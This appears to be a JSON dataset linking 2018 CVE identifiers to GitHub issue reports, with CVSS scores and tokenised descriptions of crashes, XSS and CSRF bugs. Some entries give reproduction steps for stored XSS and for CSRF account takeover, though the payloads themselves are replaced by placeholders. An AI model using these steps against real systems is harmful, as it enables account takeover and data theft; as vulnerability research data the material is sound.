        "description": "XSS Vulnerability caused by Redactor NUMBERTAG The stored XSS can be triggered once you editing content by using Redactor NUMBERTAG URLTAG plugin. it can be found in both PAGE and BLOG modules. FILETAG To developer: Please avoid use Redactor right now before they fix this issue. Reference: URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13340",
        "Issue_Url_old": "https://github.com/gleez/cms/issues/795",
        "Issue_Url_new": "https://github.com/gleez/cms/issues/795",
        "Repo_new": "gleez/cms",
        "Issue_Created_At": "2018-07-05T08:47:04Z",
        "description": "CSRF Vulnerability Discovered. Description: CSRF APITAG site request forgery) Vulnerability discovered in Gleez CMS NUMBERTAG when I penetrate testing a couple of vulnerabilities in Demo website: FILETAG POC NUMBERTAG Log in as a user or admin NUMBERTAG Add new page or blog FILETAG NUMBERTAG Intercept POST request when a normal user or admin submitting a new page or blog, FILETAG NUMBERTAG Launch a CSRF attack FILETAG Exec code: FILETAG NUMBERTAG Proof of Attack Successed! FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13421",
        "Issue_Url_old": "https://github.com/ben-strasser/fast-cpp-csv-parser/issues/67",
        "Issue_Url_new": "https://github.com/ben-strasser/fast-cpp-csv-parser/issues/67",
        "Repo_new": "ben-strasser/fast-cpp-csv-parser",
        "Issue_Created_At": "2018-07-06T08:28:54Z",
        "description": "Heap buffer overflow in APITAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ffff NUMBERTAG ff7ff at pc NUMBERTAG fd4 bp NUMBERTAG fffffffd NUMBERTAG sp NUMBERTAG fffffffd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffff NUMBERTAG ff7ff thread T NUMBERTAG fd3 in io::trim_chars<(char NUMBERTAG char NUMBERTAG trim(char &, char &) PATHTAG NUMBERTAG fd3 in void APITAG io::trim_chars<(char NUMBERTAG char NUMBERTAG io::no_quote_escape APITAG >(char , std::vector<int, std::allocator APITAG >&, APITAG std::char_traits APITAG , std::allocator APITAG > const , unsigned int) PATHTAG NUMBERTAG in void APITAG io::trim_chars<(char NUMBERTAG char NUMBERTAG APITAG io::throw_on_overflow, APITAG const , char const , char const >(unsigned int, char const , char const , char const ) PATHTAG NUMBERTAG f7 in main PATHTAG NUMBERTAG ffff NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG ffff NUMBERTAG ff7ff is located NUMBERTAG bytes to the left of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ffff6f NUMBERTAG b2 in operator APITAG long) ( PATHTAG NUMBERTAG ea NUMBERTAG in APITAG APITAG >) PATHTAG NUMBERTAG ea NUMBERTAG in APITAG const ) PATHTAG NUMBERTAG ea NUMBERTAG in APITAG io::trim_chars<(char NUMBERTAG char NUMBERTAG APITAG io::throw_on_overflow, APITAG &>(char &) PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG io::trim_chars<(char NUMBERTAG char NUMBERTAG trim(char &, char &) Shadow bytes around the buggy address NUMBERTAG e0d7ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0d7eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0d7ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0d7ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0d7ee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0d7ef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa NUMBERTAG e0d7f NUMBERTAG e0d7f NUMBERTAG e0d7f NUMBERTAG e0d7f NUMBERTAG e0d7f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING The test driver and the input case is displayed at : FILETAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13433",
        "Issue_Url_old": "https://github.com/BoostIO/Boostnote/issues/2184",
        "Issue_Url_new": "https://github.com/boostio/boostnote-legacy/issues/2184",
        "Repo_new": "boostio/boostnote-legacy",
        "Issue_Created_At": "2018-07-05T15:30:40Z",
        "description": "Another trigger position of XSS. I'm using the latest version ( PATHTAG NUMBERTAG new notes, select Markdown, write payload: APITAG It's not going to trigger now NUMBERTAG when I need to highlight the markdown code, I write it before the code. \" ` \" I trigger xss. when I enter third. FILETAG FILETAG Bootsnote is great!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13440",
        "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/49",
        "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/49",
        "Repo_new": "mpruett/audiofile",
        "Issue_Created_At": "2018-07-06T15:21:53Z",
        "description": "NULL pointer dereference in APITAG in APITAG There exists one NULL pointer dereference bug in APITAG in APITAG which allows an attacker to cause a denial of service via a crafted caf file. FILETAG To reproduce with the attached poc file: ./sfconvert $poc output format aiff APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG ff NUMBERTAG b NUMBERTAG f bp NUMBERTAG ffd2fd4dd NUMBERTAG sp NUMBERTAG ffd2fd4d9c0 T NUMBERTAG ff NUMBERTAG b NUMBERTAG e in APITAG , Track ) PATHTAG NUMBERTAG ff NUMBERTAG abd in APITAG PATHTAG NUMBERTAG ec NUMBERTAG in copyaudiodata PATHTAG NUMBERTAG ebbe4 in main PATHTAG NUMBERTAG ff NUMBERTAG c NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in APITAG , Track NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13443",
        "Issue_Url_old": "https://github.com/EOSIO/eos/issues/6585",
        "Issue_Url_new": "https://github.com/eosio/eos/issues/6585",
        "Repo_new": "eosio/eos",
        "Issue_Created_At": "2019-01-11T09:03:58Z",
        "description": "A heap buffer overflow vunnerability of wasm. This bug is already reported at hackerone and has been solved It's just public here. Summary: A heap overflow in the jit wasm which could lead to code execution. In function APITAG when adding the pointer APITAG there is no boundary check. Description: it seems that the bug happens at the WAST::lex CODETAG when realloc the APITAG ERRORTAG because oldsize >= av >system_mem\uff0cit will trigger the error APITAG invalid old size\" but why it will trigger this error, lets find when the APITAG is malloced. I wrote a gdb script to test it, and found that at ERRORTAG APITAG is not limited, and when tring to APITAG it can assess to the chunk next to it which is APITAG it will overwrite the metadata of APITAG so we will have a heap overflow here...",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13794",
        "Issue_Url_old": "https://github.com/posva/catimg/issues/34",
        "Issue_Url_new": "https://github.com/posva/catimg/issues/34",
        "Repo_new": "posva/catimg",
        "Issue_Created_At": "2018-07-09T07:59:54Z",
        "description": "buffer overflow while cating. I found a heap buffer overflow when cat an image: FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e NUMBERTAG at pc NUMBERTAG b5 bp NUMBERTAG ffe3a NUMBERTAG e NUMBERTAG sp NUMBERTAG ffe3a NUMBERTAG e NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG e NUMBERTAG thread T NUMBERTAG b4 in stbi__bmp_load_cont PATHTAG NUMBERTAG a NUMBERTAG f in stbi__ico_load PATHTAG NUMBERTAG fcf in stbi__xload_main PATHTAG NUMBERTAG a NUMBERTAG in stbi_xload PATHTAG NUMBERTAG b0c7 in img_load_from_file PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fd NUMBERTAG b NUMBERTAG b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG NUMBERTAG e NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG daee0 in malloc ( PATHTAG NUMBERTAG in stbi__bmp_load_cont PATHTAG NUMBERTAG a NUMBERTAG f in stbi__ico_load PATHTAG NUMBERTAG ff NUMBERTAG unknown module>) SUMMARY: APITAG heap buffer overflow PATHTAG in stbi__bmp_load_cont Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG a NUMBERTAG c NUMBERTAG fff NUMBERTAG b NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG c NUMBERTAG fff NUMBERTAG d0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13795",
        "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/237",
        "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/237",
        "Repo_new": "marcobambini/gravity",
        "Issue_Created_At": "2018-07-08T10:09:21Z",
        "description": "unlimit recursive depth. This will cause a endless loop: func f(a) { APITAG return f(a NUMBERTAG func APITAG { return f NUMBERTAG I think there should be a recursive depth limit (such as NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13818",
        "Issue_Url_old": "https://github.com/twigphp/Twig/issues/2743",
        "Issue_Url_new": "https://github.com/twigphp/twig/issues/2743",
        "Repo_new": "twigphp/twig",
        "Issue_Created_At": "2018-09-05T16:38:49Z",
        "description": "CVETAG . Hello. I couldn't find which change fixed CVETAG . Please help.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13833",
        "Issue_Url_old": "https://github.com/dariomanesku/cmft/issues/38",
        "Issue_Url_new": "https://github.com/dariomanesku/cmft/issues/38",
        "Repo_new": "dariomanesku/cmft",
        "Issue_Created_At": "2018-07-09T06:19:41Z",
        "description": "Stack buffer overflow in function APITAG Hi,all. I use Clang NUMBERTAG and APITAG to build cmft , this FILETAG can cause stack buffer overflow when executing this command: APITAG This is the ASAN information: ERRORTAG This is the debug information: CODETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-13843",
        "Issue_Url_old": "https://github.com/samtools/htslib/issues/731",
        "Issue_Url_new": "https://github.com/samtools/htslib/issues/731",
        "Repo_new": "samtools/htslib",
        "Issue_Created_At": "2018-07-10T01:38:20Z",
        "description": "A memory leak detected.. Sorry for that I didn't reply in my last issue immediately because I had some other stuffs to handle then. Well ,it seems that you have found the SEGV signal and fixed it. I found another problem here ,it is a memory leak issue. The program I ran is test_bgzf in test directory, the input file is APITAG in the same directory. The command line is ./test_bgzf FILETAG ''' APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f7e NUMBERTAG d NUMBERTAG in realloc ( PATHTAG NUMBERTAG d8e in bgzf_getline PATHTAG NUMBERTAG b NUMBERTAG in test_bgzf_getline APITAG NUMBERTAG c NUMBERTAG f in main APITAG NUMBERTAG f7e NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f7e NUMBERTAG d NUMBERTAG in realloc ( PATHTAG NUMBERTAG d8e in bgzf_getline PATHTAG NUMBERTAG b NUMBERTAG in test_bgzf_getline APITAG NUMBERTAG c NUMBERTAG in main APITAG NUMBERTAG f7e NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f7e NUMBERTAG d NUMBERTAG in realloc ( PATHTAG NUMBERTAG d8e in bgzf_getline PATHTAG NUMBERTAG b NUMBERTAG in test_bgzf_getline APITAG NUMBERTAG c NUMBERTAG d in main APITAG NUMBERTAG f7e NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG ) '''",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13846",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/282",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/282",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-07-09T07:30:42Z",
        "description": "A heap buffer overflow issue found. A heap buffer overflow problem has been found at APITAG ` APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ec NUMBERTAG at pc NUMBERTAG b NUMBERTAG bp NUMBERTAG fffaeec NUMBERTAG sp NUMBERTAG fffaeec NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ec NUMBERTAG thread T NUMBERTAG b NUMBERTAG in APITAG APITAG APITAG , bool, APITAG PATHTAG NUMBERTAG fb in APITAG PATHTAG NUMBERTAG e3d in main PATHTAG NUMBERTAG fb NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG ec NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG fb NUMBERTAG c2db6b2 in operator APITAG long) ( PATHTAG NUMBERTAG a NUMBERTAG a in APITAG int) PATHTAG NUMBERTAG a NUMBERTAG e8 in APITAG int) PATHTAG NUMBERTAG e in APITAG unsigned int, unsigned int) PATHTAG NUMBERTAG d3 in APITAG PATHTAG NUMBERTAG de2c in APITAG int, APITAG APITAG PATHTAG NUMBERTAG c8a in APITAG APITAG PATHTAG NUMBERTAG ab in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG e3d in main PATHTAG NUMBERTAG fb NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG APITAG APITAG APITAG , bool, APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa NUMBERTAG fa fa fa fd fa fa fa fd fa fa fa fd fd NUMBERTAG c NUMBERTAG fff9da0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fd fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa fa fa fd fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ''' The testing program is mp NUMBERTAG ts. And the input file has been put at: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13847",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/283",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/283",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-07-09T08:01:09Z",
        "description": "A SEGV signal occurred when running mp4compact. A SEGV signal occurred when running mp4compact at APITAG ERRORTAG The testing program is mp4compact. And the input file has been put at: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13865",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/27",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/27",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-07-10T03:57:23Z",
        "description": "ICMS NUMBERTAG SS and bypass iWAF. APITAG This reflective XSS does not need to log APITAG only filters the XSS like APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-13879",
        "Issue_Url_old": "https://github.com/RocketChat/Rocket.Chat/issues/10795",
        "Issue_Url_new": "https://github.com/rocketchat/rocket.chat/issues/10795",
        "Repo_new": "rocketchat/rocket.chat",
        "Issue_Created_At": "2018-05-17T11:11:36Z",
        "description": "One persistent and one reflected XSS. Hey guys, I already created a PR for the persistent XSS URLTAG There is another one which is not as critical. When you create an account, the next step will ask for a username. This field will not save HTML control characters but you will receive an error which shows the attempted username unescaped. Nothing critical but it is there.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-13996",
        "Issue_Url_old": "https://github.com/codeplea/genann/issues/24",
        "Issue_Url_new": "https://github.com/codeplea/genann/issues/24",
        "Repo_new": "codeplea/genann",
        "Issue_Created_At": "2018-07-12T07:17:05Z",
        "description": "A stack buffer overflow has been found.. A stack buffer overflow has been found in APITAG ERRORTAG The program I ran was example1, but I have made some changes in that file. The example1 I wrote has been placed at : FILETAG The input file has been put here: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-13998",
        "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/491",
        "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/491",
        "Repo_new": "clippercms/clippercms",
        "Issue_Created_At": "2018-07-11T07:49:26Z",
        "description": "Another stored XSS in Full name field of APITAG NUMBERTAG Hello I still found some Stored XSS even though many XSS issues were reported in this CMS. They are in Full Name field of user under Security > Manager Users tab and Security > Web Users which allow authenticated attacker (who has user management role) to inject/store malicious script inside Full name field. The script will be executed once Manager Users or Web Users page is accessed. Steps to reproduce stored XSS NUMBERTAG Go to Security > Manager Users or Security > Web Users tab NUMBERTAG Add new user or edit existing user NUMBERTAG In Full name field, input XSS payload and save NUMBERTAG isit Security > Manager Users or Web Uses, the payload will be executed Impact: after successful exploit, user's cookies can be stolen and CSRF validation APITAG header in this CMS) can also be bypassed. That also can lead to admin account take over. Authenticated XSS might not be a serious issue but to let malicious script executed from admin's browser is not a good thing either. Screenshots: FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-13999",
        "Issue_Url_old": "https://github.com/xwlrbh/Catfish/issues/2",
        "Issue_Url_new": "https://github.com/xwlrbh/catfish/issues/2",
        "Repo_new": "xwlrbh/catfish",
        "Issue_Created_At": "2018-07-11T09:58:24Z",
        "description": "I found a storage XSS vul in article. administrator in Website background can post article Contains storage XSS vulnerabilities: FILETAG Browse article can trigger XSS APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-14009",
        "Issue_Url_old": "https://github.com/Codiad/Codiad/issues/1078",
        "Issue_Url_new": "https://github.com/codiad/codiad/issues/1078",
        "Repo_new": "codiad/codiad",
        "Issue_Created_At": "2018-06-21T07:59:19Z",
        "description": "Active maintained / developed?. No commit since NUMBERTAG months? Is the project active maintained / developed?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14014",
        "Issue_Url_old": "https://github.com/caokang/waimai/issues/2",
        "Issue_Url_new": "https://github.com/caokang/waimai/issues/2",
        "Repo_new": "caokang/waimai",
        "Issue_Created_At": "2018-07-12T13:58:40Z",
        "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following the page poc\uff1a FILETAG //add a admin CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14016",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/10464",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10464",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-06-24T11:30:52Z",
        "description": "null pointer error/heap buffer overflow at APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Mini Dump crash report | Architecture/bits of the file (mandatory NUMBERTAG etc. | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG c NUMBERTAG a8 commit NUMBERTAG c NUMBERTAG build NUMBERTAG Expected behavior r2 should analyze a mini dump crash report binary quickly Actual behavior r2 leads to the non pointer error/heap buffer overflow Steps to reproduce the behavior Download FILETAG or FILETAG run r2 A Q $POC The Address Sanitizer output APITAG $POC1: ERRORTAG $POC2 ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-14029",
        "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/153",
        "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/153",
        "Repo_new": "creatiwity/witycms",
        "Issue_Created_At": "2018-07-11T17:36:21Z",
        "description": "CSRF on PATHTAG page lead to full account take over . Hello, I came across and tried to find bug on this CMS. I see that user edit page is vulnerable to CSRF attack because there is no CSRF token to validate user's request. it means that if an admin user visits crafted url made by attacker (via XSS or Phishing), a POST request will be generated and be submitted to PATHTAG that will change admin user information included password and email address. once exploited, attacker can fully take over admin's account. Affect url: URLTAG Steps to reproduce NUMBERTAG Check POST request when user edit information on PATHTAG FILETAG NUMBERTAG Build CSRF POC based on POST request from user/edit and store it in attacker\u2019s site APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG //< FILETAG POST request generated: FILETAG NUMBERTAG After that, user\u2019s information will be changed to value attacker put on CSRF POC Mitigation: Original password is needed in order to change new password of user URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14040",
        "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/26625",
        "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/26625",
        "Repo_new": "twbs/bootstrap",
        "Issue_Created_At": "2018-05-29T15:47:48Z",
        "description": "XSS possible in collapse data parent attribute. XSS possible in collapse data parent attribute ERRORTAG Bootstrap NUMBERTAG in combination with APITAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14040",
        "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/26423",
        "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/26423",
        "Repo_new": "twbs/bootstrap",
        "Issue_Created_At": "2018-04-30T15:28:45Z",
        "description": "NUMBERTAG ship list. Highlights CSS JS Docs Build tools",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14041",
        "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/26627",
        "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/26627",
        "Repo_new": "twbs/bootstrap",
        "Issue_Created_At": "2018-05-29T20:09:52Z",
        "description": "XSS possible in data target property of scrollspy. XSS possible in scrollspy data target attribute data target=\" APITAG \" Bootstrap NUMBERTAG in combination with APITAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14042",
